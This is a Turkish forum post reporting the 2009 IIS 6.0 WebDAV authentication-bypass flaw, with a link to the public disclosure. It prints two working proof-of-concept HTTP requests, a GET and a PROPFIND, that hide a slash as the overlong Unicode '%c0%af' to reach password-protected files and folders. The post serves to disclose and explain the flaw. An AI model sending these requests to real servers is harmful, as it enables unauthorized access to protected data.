Haylazlar Forum
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Hoşgeldiniz, Misafir.
Son Ziyaretiniz: Çarş. Ara. 31, 1969
Toplam Mesajınız: 0
Son Üyemiz : https://haylazlarforum.yetkinforum.com/u23


 

AnasayfaLatest imagesAramaKayıt OlGiriş yap

 

 IIS 6.0 Güvenlik Açığı

Aşağa gitmek 
YazarMesaj
..irem..
Uzman Mod
Uzman Mod
..irem..


Kadın Mesaj Sayısı : 97
Doğum tarihi : 07/10/94
Yaş : 30
Başarı Puanı :
IIS 6.0 Güvenlik Açığı Left_bar_bleue1 / 1001 / 100IIS 6.0 Güvenlik Açığı Right_bar_bleue

Seviye :
IIS 6.0 Güvenlik Açığı Left_bar_bleue1 / 1001 / 100IIS 6.0 Güvenlik Açığı Right_bar_bleue

İleti : !..iRemMm..!
Kayıt tarihi : 22/08/08

IIS 6.0 Güvenlik Açığı Empty
MesajKonu: IIS 6.0 Güvenlik Açığı   IIS 6.0 Güvenlik Açığı Icon_minitimeSalı Haz. 16, 2009 5:33 am

Microsoft'un Internet Information Server (IIS) 6.0 versiyonunda WebDav'dan kaynaklanan bir güvenlik açığı tespit edildi. Bu açıkla birlikte şifre korumalı dizinlere ulaşım sağlanabiliyor ve dosya yükleme işlemleri gerçekleştirilebiliyor. Ayrıca açık sadece WebDav klasörlerinde de geçerli değil, sunucunun barındırdığı tüm dizinleri kapsıyor.

Güvenlik uzmanı Nicolaos Rangos'un bildirdiğine göre aşağıdaki örnekteki gibi bir header gönderildiğinde korumalı bir dosya sıradan bir dosyaya dönüşebiliyor.


GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername

Bu örnekte slash (/) karakteri %c0%af unikodu ile gizlenmiş durumda ve güvenlik fonksiyonu bunu atlamakta bu nedenle /protected/protected.zip dosyasına ulaşım sağlanabiliyor. Translate: f seçeneği ise sıradan dosyalar için WebDav fonksiyonunu devreye sokuyor.

Doğrudan WebDav klasörlerine erişmek ise daha karmaşık olsada imkansız değil.


PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

Fakat bu yöntemlerle asp betiklerini çekebilmek mümkün değil. Benzer bir güvenlik açığı 2000 yılında IIS 4 üzerinde de tespit edilmişti. Güvenlik uzmanı Thierry Zoller bu iki güvenlik açığını kendi blogunda karşılaştırmış.

Kaynak: http://seclists.org/fulldisclosure/2009/May/0134.html
Sayfa başına dön Aşağa gitmek
 
IIS 6.0 Güvenlik Açığı
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Haylazlar Forum :: ...::Güvenlik::...  :: Güvenlik Ve Güvenlik Açıkları-
Buraya geçin: